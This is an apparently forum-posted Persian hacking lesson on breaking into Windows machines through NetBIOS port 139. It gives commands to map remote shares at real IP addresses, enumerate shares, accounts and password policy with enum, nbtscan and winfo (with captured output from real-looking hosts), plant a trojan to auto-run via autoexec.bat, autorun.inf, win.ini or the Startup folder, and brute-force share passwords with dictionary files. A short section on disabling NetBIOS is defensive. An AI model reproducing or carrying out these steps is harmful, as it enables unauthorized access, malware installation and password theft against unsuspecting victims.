۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي دونيد

که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي کنيد، يک سري آيکون مي بينيد که هر کدام

اسمي دارند. مثلا :A براي فلاپي و و و تا مي رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا

بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون

در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي کنم و دستور زير را مي نويسم:

net use L: \\217.218.84.29\SharedDocs

به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط

مي گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي شنوم:

The command completed successfully.

معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي تونين مثل

درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

۵- وقتي کار تموم شد مي تونيد درايو رو حذف کنيد. براي اينکار مي تونين روي درايو رايت کليک کنيد و Disconnect را

انتخاب کنيد. و يا اينکه از دستور

net use /delete L:

استفاده کنيد.

- نکته نکته نکته

۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29\\ که ip داراي

اشتراک است و يا اينکه تايپ کنيد SharedDocsت\217.218.84.29\\ که اصولا بايد جواب بده ( ولي من خودم تست

نکردم اينو ).

۲- من دارم به صورت استاندارد کار مي کنم. بعدا خواهم گفت که چطوري مي تونيم وقتي تو بعضي از مراحل متوقف

مي شيم، اونو دور بزنيم.

۳- NetBIOS فقط براي کلاينت ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که

بعدا خواهم گفت.

۴- اگه داريد يک کلاينت رو هک مي کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم

شده باشه.

۵- روش هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش ها استفاده از يک سري نرم افزارهاي خاص

است که تو درس بعدي توضيح مي دم و نيز يک روش ديگه اعمال تغييرات در فايل هاي HOST و LMHOST و استفاده از

find در سيستم عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.

۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر

خودمون هم فعال باشه. چون در حالت پيش فرض در کامپيوتر فعال است، معمولا مشکلي نيست.

- چگونه NetBIOS را روي کامپيوتر خودمان فعال يا غير فعال کنيم؟

براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روش هاي مختلفي هست. جدول پاييني براي همين

موضوع طراحي شده است:

Win 2000 Win XP Home Win XP Professional Start > Programs > Administrative Tools > Local Security

Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local

policy setting > "No access without explicit anonymous permissions" > Ok Start > Programs > Administrative

Tools > Local Security Settings > Local Policies >

1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled

2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled Start > Run

> regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control >

LSA > RestrictAnonymous=2 مي تونيد به کمک فايروال يا روتر پورت هاي زير را ببنديد:

135 TCP DCE/RPC Portmapper

137 TCP/UDP NetBIOS Name Service

138 TCP/UDP NetBIOS Datagram Service

139 TCP NetBIOS Session Service

445 TCP Microsoft-DS (Windows 2000 CIFS/SMB

۱- وقتي پورت ۱۳۹ رو مي بنديد، ديگه نمي تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در

آوريد). پس وقتي که کسي رو مي خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.

۲- مي بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.

۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش هاي بالا، گزينه اي که مخالف

گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته ايم، شما Disable را انتخاب کنيد.

- چگونه از اين امکانات به اشتراک گذاشتن، براي اجراي يک تروجان روي کامپيوتر قرباني استفاده کنيم؟

خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي کنم تو يکي از درس هاي آينده اونو توضيح بدم.

ما اينجا مي خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟

تروجان به طور ساده برنامه اي اجرايي است، که ما براي طرف مقابل مي فرستيم و اگه طرف مقابل اونو اجرا کنه، ما

مي تونيم کنترل سيستم اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي دم.

حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :

روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل

تروجان ( سرور تروجان ) را upload مي کنم به اون کامپيوتر و اسمي براش انتخاب مي کنم که طرف مقابل رو به اجراي

فايل تشويق کنه. يک اشتباهي که بعضي ها مي کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر

مي آد و فايل رو دابل کليک مي کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي شه نه کامپيوتر قرباني.

پس ما فقط فايل رو مي فرستيم و منتظر مي مونيم که طرف مقابل اجرا کنه.

حالا چند روش رو مطرح مي کنم که در شرايط خاص حالتي رو ايجاد مي کنه که نيازي با دابل کليک توسط قرباني نباشد:

۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل

اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d:\newfolder باشد، سطري که

اضافه مي کنيم به صورت زير است:

d:\newfolder\ali.exe

در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.

۲- اگه به درايو C دسترسي داريد، مي تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر

آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون

تغيير دهيد) :

[autorun]

open=d:\newfolder\ali.exe

۳- اگه به فولدر ويندوز دسترسي داريد، مي تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا

کنيد. در اين حالت هم به محض restart اجرا خواهد شد.

۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه

کنيد:

run=d:\newfolder\ali.exe

۵- اگه به فولدر ويندوز دسترسي داريد، مي تونيد تروجان رو به فولدر Start Menu\Startup اضافه کنيد. در اين حالت

نيازي به ويرايش هيچ فايل ديگري نيست.

- ابزارهاي کمکي: ۱- ابزارهاي خط فرماني

۱- enum :

اين برنامه را از اينجا داون لود کنيد. enum نرم افزاري با قابليت هاي فوق العاده است. از جمله توانايي هايي که دارد، در

مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد مي تونيم به کمک enum و

ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به

نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مب دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share

هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراک هاي آن ip

خاص در آن لحظه رو بدست بيارم:

enum -S 217.218.84.29

و جواب شنيدم:

server: 217.218.84.29

setting up session... success.

enumerating shares (pass 1)... got 10 shares, 0 left:

E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer

cleaning up... success.

ملاحظه مي فرماييد که درايو هاي E و D و F و C و نيز SharedDocs و ... ليست شده است. بقيه مراحل مثل درس ۲۱

است. (دقت کنيد که در اين حالت نيازي به null session نيست ).

۲- nbtscan :

اين برنامه را از اينجا داون لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که مي تونه تعداد زيادي ip رو

همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راه حلي است براي سوالي که خيلي از شما دوستان

پرسيده بودين. مثلا اگه بنويسم:

nbtscan -v -s : 195.219.49.0-30

که ليست اشتراک ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي شنوم:

195.219.49.1 Recvfrom failed: Connection reset by peer

195.219.49.5 Recvfrom failed: Connection reset by peer

195.219.49.6 Recvfrom failed: Connection reset by peer

195.219.49.7 Recvfrom failed: Connection reset by peer

195.219.49.8 Recvfrom failed: Connection reset by peer

195.219.49.12 Recvfrom failed: Connection reset by peer

195.219.49.23:MRS.ZADE :00U

195.219.49.23:ATINET_MRA :00G

195.219.49.23:MRS.ZADE :03U

195.219.49.23:MAC:44-45-53-54-00-00

195.219.49.28:MAC:44-45-53-54-00-00

195.219.49.26:KIYARASH-R96L0K:00U

195.219.49.26:KIYARASH-R96L0K:20U

195.219.49.26:WORKGROUP :00G

195.219.49.26:WORKGROUP :1eG

195.219.49.26:MAC:00-53-45-00-00-00

195.219.49.22:FARHANG-ZCT780D:00U

195.219.49.22:FARHANG-ZCT780D:20U

195.219.49.22:WORKGROUP :00G

195.219.49.22:WORKGROUP :1eG

195.219.49.22:MAC:00-53-45-00-00-00

195.219.49.29:TESSA :00U

195.219.49.29:WORKGROUP :00G

195.219.49.29:TESSA :03U

195.219.49.29:MAC:44-45-53-54-00-00

195.219.49.25:MAC:44-45-53-54-00-00

در مورد ip هايي که 20U را مي بينيد، يعني sharing رو ميشه استفاده کرد.

۳- winfo :

اينم از جمله برنامه هايي است که بايد بگم آخر برنامه است!! از اينجا داون لود کنيد. البته توانايي تست تعداد زيادي ip

رو نداره ولي وقتي يه ip رو تست مي کنه همه چي شو در رو مي کنه. (البته ميشه گفت همه اين کارها رو مي شه با

enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :

winfo 195.219.49.184 -n -v

و به نتايج زير رسيدم:

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom

- كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
Trying to establish null session...

Null session established.


SYSTEM INFORMATION:

- OS version: 4.0

DOMAIN INFORMATION:

- Primary domain (legacy): DSG

- Account domain: TEHRAN

Warning: Unable to retrieve domain DNS information.

Reason : Not supported by the remote OS.


PASSWORD POLICY:

- Time between end of logon time and forced logoff: No forced logoff

- Maximum password age: 42 days

- Minimum password age: 0 days

- Password history length: 0 passwords

- Minimum password length: 0 characters

LOCOUT POLICY:

- Lockout duration: 30 minutes

- Reset lockout counter after 30 minutes

- Lockout threshold: 0

SESSIONS:

- Computer: ARTAWILL-V0P1QR

- User:

LOGGED IN USERS:

Administrator

USER ACCOUNTS:

Administrator

- Password age: 666 days

- Privilege level: Administrator

- Home directory:

- Home directory mapped as:

- Comment: Built-in account for administering the computer/domain

- Account is: Enabled

- User can change password: Yes

- Account is locked out: No

- Password never expires: Yes

- The account is: Normal user

- Logon script path:

- Full name:

- User comment:

- Can log in from workstations: All

- Last logon to this DC / computer: Mon Mar 03 2323 2003

- Last logoff from this DC / computer: Tue Dec 11 2337 2001

- Account expires: Never

- Max disk space: Unlimited

- Failed logins in a row to this DC / computer: 0

- Path to user profile:

- Password has expired: No

(This account is the built-in administrator account)

Guest

- Password age: 680 days

- Privilege level: Guest

- Home directory:

- Home directory mapped as:

- Comment: Built-in account for guest access to the computer/domain

- Account is: Disabled

- User can change password: No

- Account is locked out: No

- Password never expires: Yes

- The account is: Normal user

- Logon script path:

- Full name:

- User comment:

- Can log in from workstations: All

- Last logon to this DC / computer: None

- Last logon to this DC / computer: None

- Account expires: Never

- Max disk space: Unlimited

- Failed logins in a row to this DC / computer: 0

- Path to user profile:

- Password has expired: No

(This account is the built-in guest account)

TEST

- Password age: 680 days

- Privilege level: User

- Home directory:

- Home directory mapped as:

- Comment:

- Account is: Enabled

- User can change password: Yes

- Account is locked out: No

- Password never expires: No

- The account is: Normal user

- Logon script path:

- Full name:

- User comment:

- Can log in from workstations: All

- Last logon to this DC / computer: None

- Last logon to this DC / computer: None

- Account expires: Never

- Max disk space: Unlimited

- Failed logins in a row to this DC / computer: 0

- Path to user profile:

- Password has expired: Yes

WORKSTATION TRUST ACCOUNTS:

INTERDOMAIN TRUST ACCOUNTS:

SERVER TRUST ACCOUNTS:

SHARES:

ADMIN$

- Type: Special share reserved for IPC or administrative share

- Remark: Remote Admin

IPC$

- Type: Unknown

- Remark: Remote IPC

C$

- Type: Special share reserved for IPC or administrative share

- Remark: Default share

بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي تونين، share ها رو

ببينيد.

[OBAID]

۴- NAT :

اين برنامه را از اينجا داون لود کنيد. يکي از مهم ترين کاربرد هاي اون crack کردن پسورد sharing است ( مثل enum ).

براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مي نويسيم. حتما تست کنيد و نتيجه رو

ببينيد... ( تکليف براي خودتون )

۵- و ...

- ابزارهاي کمکي: ۲- ابزارهاي گرافيکي

۱- netbrute :

اين برنامه را از اينجا داون لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي کنم اگرچه به اندازه دو نرم افزار بعدي

مشهور نيست. من نمي خوام روش کار با اينو توضيح بدم چون خيلي تابلو ه! ضمنا اين نرم افزار داخل خودش يک پورت

اسکنر هم داره که خيلي به درد مي خوره. حتما حتما حتما داون لود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين

ازش. قرار نيست که همي چي رو من بهتون بگم !!

۲- Legion :

اگه بگم مشهورترين نرم افزار اسکن کردن پورت ۱۳۹ اين نرم افزاره، سخن گزافي نيست!! خيلي ها کشته مرده اون

هستن ولي من زياد ازش خوشم نمي آد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول لود

کنيد، اينجا رو کليک کنيد.

۳- DumpSec يا DumpACL :

اين هم خيلي معروفه. اگه خواستين مي تونين از اينجا داون لود کنيد.

- آيا چيز ديگه اي راجع به اين پورت مونده که بحث نشده باشد؟

بله!

۱- يه نرم افزاري هست به اسم pqwak که اين طوري که مي گن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، مي تونه پسورد

اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي کنه و اونو exploit مي کنه)

چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو

کار کلاينت اش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي خواين پيدا کنيد.

۲- ما بحث استفاده از نقاط ضعف پورت ها رو هنوز شروع نکرده ايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال

روش هايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير مي کرديم رو دور بزنيم.

- نکاتي راجع به enum

خوب قبلا گفتم که enum نرم افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي خوام دو کاربرد خاص از اونو

براتون توضيح بدم:

۱- گرفتن password policy information :

در ويندوزهاي NT مي شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون

چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده مي کنيم. مثلا مي نويسيم:

enum -P xxx.xxx.xxx.xxx

و جواب مي شنوم:

server: xxx.xxx.xxx.xxx

setting up session... success.

password policy:

min length: none

min age: none

max age: 42 days

lockout threshold: none

lockout duration: 30 mins

lockout reset: 30 mins

cleaning up... success.

خودتون که دارين مي بينين!

۲- استفاده از روش cracking براي پيدا کردن پسورد:

اگه با NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت ها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه.

(پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري

نمي تونيد بکنيد. پس ما کاري که مي کنيم، اينه که يک سري پسورد را توسط enum تست مي کنيم که يکي جواب بده

- يا اينکه نده !

اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute force يا bf

مي گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها

استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...

حالا چيري مي خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده مي کنن. براي پيدا کردن اين

فايل ها که اصطلاحا dictionary file ناميده مي شوند به صورت زير است:

الف) استفاده از ديکشنري هاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ مي باشد با حجمي حدود ۲۴

مگابايت!

ب) بعضي وقت ها خودمون مي خواهيم يه ديکشنري بسازيم، در اين موارد کاري که مي کنيم اينه که از نرم افزارهاي

سازنده ديکشنري استفاده مي کنيم. مثلا وقتي که شما مي دونيد که فلاني از پسوردهاي ۸ حرفي استفاده مي کنه

و ... براي اين کار نرم افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و

PASSLIST.TXT GENERATOR و ...

حالا که يه فايل ديکشنري دارم مي تونم کار کرک پسورد NetBIOS رو شروع کنم. فرض کنيد که وقتي مي خوام Ali رو

در يک ip به شماره xxx.xxx.xxx.xxx رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي

اين کار استفاده مي کنيم، اينه:

enum -D -f "theargon.lst" -u "Ali" xxx.xxx.xxx.xxx

حالا enum مياد و تمام پسوردها رو تست مي کنه تا ايشالله به جواب برسه!

اينقدر که از enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد داره اينه که خيلي کند کار ميکنه.

ممکنه ساعت ها وقت لازم باشه. راه حل چيه؟

- راه حل براي سرعت بخشيدن کرک کردن پسورد NetBIOS

راه حل اينه که اصلا از enum استفاده نکنيد. براي کرک پسورد NetBIOS سعي کنيد از نرم افزار SMB Auditing Tool

استفاده کنيد. در عرض چند دقيقه کار تموم ميشه! دليلش هم اينه که اين نرم افزار از يک bug استفاده مي کنه که

اجازه ميده تعداد زيادي پسورد رو در يک لحظه تست کنيد. اينم بگم که اين نرم افزار مخصوص سيستم عامل لينوکس و

يونيکسه